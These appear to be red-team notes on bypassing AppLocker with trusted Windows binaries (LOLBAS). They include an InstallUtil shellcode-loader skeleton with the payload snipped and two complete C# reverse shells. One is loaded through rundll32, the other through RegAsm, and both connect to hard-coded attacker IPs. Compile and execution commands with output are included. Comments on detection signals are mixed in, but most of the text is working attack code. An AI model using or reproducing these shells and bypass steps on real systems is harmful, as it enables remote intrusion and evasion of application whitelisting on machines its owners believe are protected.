LOLBAS / LOLDrivers / LOLESXi
LOLBAS
InstallUtil
PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
FilePath PolicyDecision MatchingRule
-------- -------------- ------------
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Allowed (Default Rule) All files located in the Windows folder
In Visual Studio, open the Project > Add Reference... menu, click Browse... and select
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll
using System;
using System.Configuration.Install;
/// <summary>
/// Host executable for the installer class that follows. Main is intentionally empty:
/// the page runs this binary through InstallUtil.exe /U (see the "Exploit" line further
/// down), which is what reaches the Installer's Uninstall override rather than Main.
/// </summary>
public class NotMalware_IU
{
    /// <summary>Entry point; does nothing when the executable is launched directly.</summary>
    public static void Main(string[] args)
    {
    }
}
/// <summary>
/// Installer subclass that InstallUtil.exe discovers through the RunInstaller attribute.
/// The payload sits in the Uninstall override, which is reached with InstallUtil.exe /U
/// (the "Exploit" line below); the shellcode itself is snipped on this page.
/// Defender notes: AppLocker's default rule allows this because InstallUtil.exe lives under
/// C:\Windows (see the Test-AppLockerPolicy output above); an explicit deny or publisher rule
/// for InstallUtil.exe closes that gap. InstallUtil.exe started with /U against an assembly
/// outside the Windows directory is a common hunting signal for this technique.
/// </summary>
[System.ComponentModel.RunInstaller(true)]
public class A : System.Configuration.Install.Installer
{
    // kernel32 imports: the allocate -> change page protection -> run on a new thread -> wait
    // sequence used to execute a byte buffer inside the current process. The flag values that
    // would reveal the requested protections are in the snipped portion of Uninstall.
    [DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
    [DllImport("kernel32")]
    private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);
    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    /// <summary>
    /// Called by InstallUtil.exe when invoked with /U on this assembly. Holds an encoded
    /// shellcode string, decodes it and (in the snipped part) runs it via the imports above.
    /// </summary>
    /// <param name="savedState">Installer state dictionary passed in by InstallUtil; unused here.</param>
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        // Shellcode (micr0_shell) — encoded payload, contents removed on this page
        string bufEnc = "<SNIP>";
        // Decrypt shellcode — the decode/allocate/execute steps are snipped
        <SNIP>
    }
}
Exploit:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Tools\NotMalware_IU\NotMalware_IU\bin\x64\Release\NotMalware_IU.exe
RunDll32
PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\System32\rundll32.exe
FilePath PolicyDecision MatchingRule
-------- -------------- ------------
C:\Windows\System32\rundll32.exe Allowed (Default Rule) All files located in the Windows folder
Create a Class Library (.NET Framework) project. Open Project > Manage NuGet Packages..., click the Settings (gear) icon and uncheck the first two checkboxes. Select the package source, select DllExport and click Install, then Apply. Mark the Installed checkbox, click Apply, and then Reload All.
using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;
using rundll;
namespace RShell
{
/// <summary>
/// Reverse shell exported as an unmanaged entry point (the DllExport attribute, presumably
/// provided by the DllExport package set up above) so that rundll32.exe can load it — see the
/// "Exploitation" line below. Everything happens in <see cref="DllMain"/>;
/// <see cref="HandleDataReceived"/> relays the child process's output to the socket.
/// Defender notes: AppLocker's default rule allows rundll32.exe because it lives under C:\Windows
/// (Test-AppLockerPolicy output above). Observable artifacts of this sample: rundll32.exe loading a
/// DLL from a non-system path such as the C:\Tools location used below, an outbound TCP connection
/// from rundll32.exe, and rundll32.exe spawning the 32-bit powershell.exe with "-ep bypass -nologo".
/// </summary>
internal class Program
{
    // Shared between DllMain and the output callback; the callback has no other way to reach the socket.
    private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it

    /// <summary>
    /// Exported entry point. Connects to the hard-coded address, starts a hidden PowerShell with all
    /// three standard streams redirected, forwards each line received over the socket to PowerShell's
    /// stdin until the line "exit" arrives, then waits for PowerShell to end and closes the socket.
    /// Every exception is swallowed by the catch at the bottom, so failures leave no trace in the caller.
    /// </summary>
    [DllExport("DllMain")]
    public static void DllMain()
    {
        try
        {
            // Connect to <IP> on <Port>/TCP — both values are hard-coded here
            TcpClient client = new TcpClient();
            client.Connect("10.10.14.133", 1010);
            // Set up input/output streams on the one socket: reader for incoming commands, writer for output
            Stream stream = client.GetStream();
            StreamReader streamReader = new StreamReader(stream);
            streamWriter = new StreamWriter(stream);
            // Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
            Process p = new Process();
            p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; //32-bit version, matching the x86 build used below
            p.StartInfo.Arguments = "-ep bypass -nologo";
            p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.RedirectStandardError = true;
            p.StartInfo.RedirectStandardInput = true;
            // Both stdout and stderr go through the same callback
            p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
            p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);
            // Start process and begin reading output asynchronously
            p.Start();
            p.BeginOutputReadLine();
            p.BeginErrorReadLine();
            // Re-route user-input to STDIN of the PowerShell process
            // If we see the user sent "exit", we can stop
            // NOTE(review): ReadLine() returns null once the peer disconnects; the Equals call then
            // throws and the outer catch swallows it, so the loop ends on "exit" or a dropped connection.
            string userInput = "";
            while (!userInput.Equals("exit"))
            {
                userInput = streamReader.ReadLine();
                p.StandardInput.WriteLine(userInput);
            }
            // Wait for PowerShell to exit (based on user-inputted exit), and close the process
            p.WaitForExit();
            client.Close();
        }
        catch (Exception) { } // Deliberately silent: nothing is logged or rethrown
    }

    /// <summary>
    /// Callback for the PowerShell process's stdout and stderr lines. Each non-null line is written
    /// to the socket and flushed immediately; a null Data value is skipped.
    /// </summary>
    /// <param name="sender">The Process raising the event; unused.</param>
    /// <param name="e">Carries the output line in <c>e.Data</c>.</param>
    private static void HandleDataReceived(object sender, DataReceivedEventArgs e)
    {
        if (e.Data != null)
        {
            streamWriter.WriteLine(e.Data);
            streamWriter.Flush();
        }
    }
}
}
Build: Release - Any CPU (because the 32-bit version of PowerShell is used)
Exploitation:
C:\Windows\System32\RunDll32.exe C:\Tools\rundll\rundll\bin\Release\x86\rundll.dll,DllMain
Tool - ExecIT
Wevtutil.exe
Regasm - Bypass AppLocker to RShell
Generate a public/private key pair; the key pair is written to a file called key.snk:
C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools>sn.exe -k key.snk
Microsoft (R) .NET Framework Strong Name Utility Version 4.0.30319.0
Copyright (c) Microsoft Corporation. All rights reserved.
Key pair written to key.snk
or
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $key = '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'
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $Content = [System.Convert]::FromBase64String($key)
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> Set-Content key.snk -Value $Content -Encoding Byte
Visual Studio project: Class Library (.NET Framework)
- Project name: RegasmDLL
Rename class1.cs to Regasm.cs
using System;
using System.EnterpriseServices;
using System.IO;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
namespace regsvcser
{
/// <summary>
/// ServicedComponent whose COM registration hooks run code under RegAsm.exe. The attributed static
/// methods are called by RegAsm while it registers (<see cref="RegisterClass"/>) or, with /U,
/// unregisters (<see cref="UnRegisterClass"/>) the assembly; both hand off to
/// <see cref="Shellcode.Exec"/>. The Exploit section below takes the /U path, as the
/// "I shouldn't really execute either." line in its output shows. The assembly is signed with
/// key.snk at compile time (see the csc line below).
/// Defender notes: RegAsm.exe is allowed by AppLocker's default Windows-folder rule like the other
/// binaries on this page; RegAsm.exe run with /U against an assembly in a user-writable path, or
/// RegAsm.exe making outbound network connections, are the hunting signals for this technique.
/// </summary>
public class Bypass : ServicedComponent
{
    /// <summary>Instance constructor; only prints a marker line.</summary>
    public Bypass() { Console.WriteLine("I am a basic COM Object"); }

    [ComRegisterFunction] // Called by RegAsm.exe while registering the assembly
    public static void RegisterClass(string key)
    {
        Console.WriteLine("I shouldn't really execute");
        Shellcode.Exec();
    }

    [ComUnregisterFunction] // Called by RegAsm.exe while unregistering (/U) — not on a failed registration; this is the path used below
    public static void UnRegisterClass(string key)
    {
        Console.WriteLine("I shouldn't really execute either.");
        Shellcode.Exec();
    }
}
/// <summary>
/// Payload invoked from both COM registration hooks above. Connects to the hard-coded address,
/// then runs every line received as "cmd.exe /c &lt;line&gt;" and writes the command's stdout and
/// stderr back over the socket, until the peer sends "exit" or disconnects.
/// Defender notes: each received command produces a cmd.exe child of RegAsm.exe with no window,
/// so RegAsm.exe spawning cmd.exe is a high-signal process-tree event. The "Connected to server"
/// and "I shouldn't really execute" lines are also printed on the console of whoever ran RegAsm.
/// </summary>
public class Shellcode
{
    /// <summary>
    /// Runs the command loop. Does not throw: connection-level errors are printed to the console,
    /// per-command errors are sent back to the peer and the loop continues.
    /// </summary>
    public static void Exec()
    {
        string serverIp = "10.10.14.166"; // Replace with the attacker's IP
        int serverPort = 8080; // Replace with the attacker's port
        try
        {
            // All four are disposed when the loop exits; AutoFlush pushes each line to the peer immediately
            using (TcpClient client = new TcpClient(serverIp, serverPort))
            using (NetworkStream stream = client.GetStream())
            using (StreamReader reader = new StreamReader(stream))
            using (StreamWriter writer = new StreamWriter(stream) { AutoFlush = true })
            {
                Console.WriteLine("Connected to server");
                while (true)
                {
                    // Read command from server; null means the peer closed the connection
                    string command = reader.ReadLine();
                    if (command == null || command.ToLower() == "exit")
                        break;
                    // Execute command through cmd.exe /c with both output streams captured and no window
                    try
                    {
                        var process = new System.Diagnostics.Process
                        {
                            StartInfo = new System.Diagnostics.ProcessStartInfo
                            {
                                FileName = "cmd.exe",
                                Arguments = "/c " + command,
                                RedirectStandardOutput = true,
                                RedirectStandardError = true,
                                UseShellExecute = false,
                                CreateNoWindow = true
                            }
                        };
                        process.Start();
                        // stdout is drained fully before stderr; both are sent only after the child has exited
                        string output = process.StandardOutput.ReadToEnd();
                        string error = process.StandardError.ReadToEnd();
                        process.WaitForExit();
                        writer.WriteLine(output);
                        writer.WriteLine(error);
                    }
                    catch (Exception ex)
                    {
                        // A failing command is reported to the peer; the loop keeps going
                        writer.WriteLine("Error: " + ex.Message);
                    }
                }
            }
        }
        catch (Exception ex)
        {
            // Connection or stream failure: report locally and return
            Console.WriteLine("Error: " + ex.Message);
        }
    }
}
}
Compile
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /target:library /out:C:\Tools\RegasmDLL\Regasm.dll /keyfile:key.snk C:\Tools\RegasmDLL\RegasmDLL\Regasm.cs
Microsoft (R) Visual C# Compiler version 4.8.4161.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
Exploit
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /U C:\Tools\RegasmDLL\Regasm.dll
Microsoft .NET Framework Assembly Registration Utility version 4.8.4161.0
for Microsoft .NET Framework version 4.8.4161.0
Copyright (C) Microsoft Corporation. All rights reserved.
I shouldn't really execute either.
Connected to server
LOLDrivers
Living off the land drivers
LOLESXi
Living Off The Land ESXi